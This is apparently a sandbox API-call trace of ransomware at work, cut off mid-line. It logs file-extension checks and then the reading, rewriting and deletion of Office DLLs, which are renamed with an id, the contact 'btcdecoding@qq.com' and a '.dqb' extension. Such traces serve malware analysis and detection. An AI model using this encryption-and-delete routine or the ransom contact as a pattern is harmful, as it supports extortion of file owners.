[0055.858] lstrlenW (lpString=".zip") returned 4 [0055.858] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0055.858] lstrlenW (lpString=".rar") returned 4 [0055.858] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0055.858] lstrlenW (lpString=".bz2") returned 4 [0055.858] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0055.858] lstrlenW (lpString=".7z") returned 3 [0055.859] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0055.859] lstrlenW (lpString=".dbf") returned 4 [0055.859] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0055.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0055.859] lstrlenW (lpString=".1cd") returned 4 [0055.859] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0055.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0055.859] lstrlenW (lpString=".jpg") returned 4 [0055.859] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0055.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0055.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0055.859] lstrlenW (lpString=".doc") returned 4 [0055.859] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0055.859] lstrlenW (lpString=".docx") returned 5 [0055.859] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0055.859] lstrlenW (lpString=".pdf") returned 4 [0055.859] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0055.859] lstrlenW (lpString=".xls") returned 4 [0055.859] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0055.859] lstrlenW (lpString=".xlsx") returned 5 [0055.859] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0055.859] lstrlenW (lpString=".ppt") returned 4 [0055.859] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0055.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0055.859] lstrlenW (lpString=".zip") returned 4 [0055.859] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0055.859] lstrlenW (lpString=".rar") returned 4 [0055.859] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0055.859] lstrlenW (lpString=".bz2") returned 4 [0055.859] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0055.859] lstrlenW (lpString=".7z") returned 3 [0055.859] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0055.860] lstrlenW (lpString=".dbf") returned 4 [0055.860] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0055.860] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0055.860] lstrlenW (lpString=".1cd") returned 4 [0055.860] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0055.860] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0055.860] lstrlenW (lpString=".jpg") returned 4 [0055.860] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0055.860] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0055.860] lstrlenW (lpString="ACEDAO.DLL") returned 10 [0055.860] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0055.860] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=744888) returned 1 [0055.861] CloseHandle (hObject=0x1f8) returned 1 [0055.861] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll")) returned 0x20 [0055.861] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0055.861] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0055.861] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.861] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.861] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0055.861] GetLastError () returned 0x0 [0055.861] ReadFile (in: hFile=0x1f8, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0xb5db8, lpOverlapped=0x0) returned 1 [0055.876] WriteFile (in: hFile=0x240, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xb5dc0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xb5dc0, lpOverlapped=0x0) returned 1 [0056.091] ReadFile (in: hFile=0x1f8, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0056.091] WriteFile (in: hFile=0x240, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe8, lpOverlapped=0x0) returned 1 [0056.091] SetEndOfFile (hFile=0x240) returned 1 [0056.091] CloseHandle (hObject=0x240) returned 1 [0056.091] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.091] SetEndOfFile (hFile=0x1f8) returned 1 [0056.097] CloseHandle (hObject=0x1f8) returned 1 [0056.097] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.097] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll")) returned 1 [0056.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0056.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0056.098] lstrlenW (lpString=".doc") returned 4 [0056.098] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.098] lstrlenW (lpString=".docx") returned 5 [0056.098] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0056.098] lstrlenW (lpString=".pdf") returned 4 [0056.098] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.098] lstrlenW (lpString=".xls") returned 4 [0056.098] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.098] lstrlenW (lpString=".xlsx") returned 5 [0056.098] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0056.098] lstrlenW (lpString=".ppt") returned 4 [0056.098] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0056.098] lstrlenW (lpString=".zip") returned 4 [0056.098] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.098] lstrlenW (lpString=".rar") returned 4 [0056.098] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.098] lstrlenW (lpString=".bz2") returned 4 [0056.098] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.098] lstrlenW (lpString=".7z") returned 3 [0056.098] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0056.098] lstrlenW (lpString=".dbf") returned 4 [0056.098] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0056.098] lstrlenW (lpString=".1cd") returned 4 [0056.098] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0056.098] lstrlenW (lpString=".jpg") returned 4 [0056.098] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0056.098] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0056.098] lstrlenW (lpString=".doc") returned 4 [0056.099] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.099] lstrlenW (lpString=".docx") returned 5 [0056.099] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0056.099] lstrlenW (lpString=".pdf") returned 4 [0056.099] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.099] lstrlenW (lpString=".xls") returned 4 [0056.099] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.099] lstrlenW (lpString=".xlsx") returned 5 [0056.099] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0056.099] lstrlenW (lpString=".ppt") returned 4 [0056.099] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0056.099] lstrlenW (lpString=".zip") returned 4 [0056.099] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.099] lstrlenW (lpString=".rar") returned 4 [0056.099] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.099] lstrlenW (lpString=".bz2") returned 4 [0056.099] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.099] lstrlenW (lpString=".7z") returned 3 [0056.099] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0056.099] lstrlenW (lpString=".dbf") returned 4 [0056.099] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0056.099] lstrlenW (lpString=".1cd") returned 4 [0056.099] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0056.099] lstrlenW (lpString=".jpg") returned 4 [0056.099] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.099] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0056.100] lstrlenW (lpString="ACEEXCL.DLL") returned 11 [0056.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0056.100] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=899992) returned 1 [0056.100] CloseHandle (hObject=0x1f8) returned 1 [0056.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll")) returned 0x20 [0056.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0056.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0056.100] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.100] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0056.101] GetLastError () returned 0x0 [0056.101] ReadFile (in: hFile=0x1f8, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0xdbb98, lpOverlapped=0x0) returned 1 [0056.118] WriteFile (in: hFile=0x240, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xdbba0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xdbba0, lpOverlapped=0x0) returned 1 [0056.324] ReadFile (in: hFile=0x1f8, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0056.324] WriteFile (in: hFile=0x240, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0056.444] SetEndOfFile (hFile=0x240) returned 1 [0056.444] CloseHandle (hObject=0x240) returned 1 [0056.444] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.444] SetEndOfFile (hFile=0x1f8) returned 1 [0056.452] CloseHandle (hObject=0x1f8) returned 1 [0056.453] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.453] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll")) returned 1 [0056.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0056.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0056.581] lstrlenW (lpString=".doc") returned 4 [0056.581] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.581] lstrlenW (lpString=".docx") returned 5 [0056.581] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0056.582] lstrlenW (lpString=".pdf") returned 4 [0056.582] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.582] lstrlenW (lpString=".xls") returned 4 [0056.582] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.582] lstrlenW (lpString=".xlsx") returned 5 [0056.582] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0056.582] lstrlenW (lpString=".ppt") returned 4 [0056.582] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0056.582] lstrlenW (lpString=".zip") returned 4 [0056.582] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.582] lstrlenW (lpString=".rar") returned 4 [0056.582] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.582] lstrlenW (lpString=".bz2") returned 4 [0056.582] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.582] lstrlenW (lpString=".7z") returned 3 [0056.582] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0056.582] lstrlenW (lpString=".dbf") returned 4 [0056.582] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0056.582] lstrlenW (lpString=".1cd") returned 4 [0056.582] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0056.582] lstrlenW (lpString=".jpg") returned 4 [0056.582] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0056.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0056.582] lstrlenW (lpString=".doc") returned 4 [0056.582] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.582] lstrlenW (lpString=".docx") returned 5 [0056.582] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0056.582] lstrlenW (lpString=".pdf") returned 4 [0056.583] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.583] lstrlenW (lpString=".xls") returned 4 [0056.583] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.583] lstrlenW (lpString=".xlsx") returned 5 [0056.583] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0056.583] lstrlenW (lpString=".ppt") returned 4 [0056.583] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0056.583] lstrlenW (lpString=".zip") returned 4 [0056.583] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.583] lstrlenW (lpString=".rar") returned 4 [0056.583] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.583] lstrlenW (lpString=".bz2") returned 4 [0056.583] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.583] lstrlenW (lpString=".7z") returned 3 [0056.583] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0056.583] lstrlenW (lpString=".dbf") returned 4 [0056.583] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0056.583] lstrlenW (lpString=".1cd") returned 4 [0056.583] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0056.583] lstrlenW (lpString=".jpg") returned 4 [0056.583] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.583] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0056.583] lstrlenW (lpString="ACER3X.DLL") returned 10 [0056.583] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.660] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=451480) returned 1 [0057.660] CloseHandle (hObject=0x230) returned 1 [0057.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll")) returned 0x20 [0057.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0057.660] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.660] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.660] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.660] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0057.661] GetLastError () returned 0x0 [0057.661] ReadFile (in: hFile=0x230, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x6e398, lpOverlapped=0x0) returned 1 [0057.670] WriteFile (in: hFile=0x204, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x6e3a0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x6e3a0, lpOverlapped=0x0) returned 1 [0057.677] ReadFile (in: hFile=0x230, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0057.677] WriteFile (in: hFile=0x204, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe8, lpOverlapped=0x0) returned 1 [0057.677] SetEndOfFile (hFile=0x204) returned 1 [0057.677] CloseHandle (hObject=0x204) returned 1 [0057.677] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.677] SetEndOfFile (hFile=0x230) returned 1 [0057.681] CloseHandle (hObject=0x230) returned 1 [0057.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0057.681] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll")) returned 1 [0057.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0057.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0057.682] lstrlenW (lpString=".doc") returned 4 [0057.682] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.682] lstrlenW (lpString=".docx") returned 5 [0057.682] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1 [0057.682] lstrlenW (lpString=".pdf") returned 4 [0057.682] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.682] lstrlenW (lpString=".xls") returned 4 [0057.682] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.682] lstrlenW (lpString=".xlsx") returned 5 [0057.682] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1 [0057.682] lstrlenW (lpString=".ppt") returned 4 [0057.682] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0057.682] lstrlenW (lpString=".zip") returned 4 [0057.682] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.682] lstrlenW (lpString=".rar") returned 4 [0057.682] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.682] lstrlenW (lpString=".bz2") returned 4 [0057.682] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.682] lstrlenW (lpString=".7z") returned 3 [0057.682] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 